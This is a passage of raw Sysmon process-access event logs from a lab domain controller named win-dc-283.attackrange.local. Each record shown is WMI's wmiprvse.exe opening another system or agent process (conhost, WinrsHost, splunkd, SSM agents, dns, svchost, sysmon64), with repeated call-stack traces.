Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026224Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026223Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026222Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026221Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026220Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026219Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026218Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026217Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026216Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026215Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026214Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026213Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026212Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026211Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026210Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026209Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026208Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026207Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026206Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026205Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 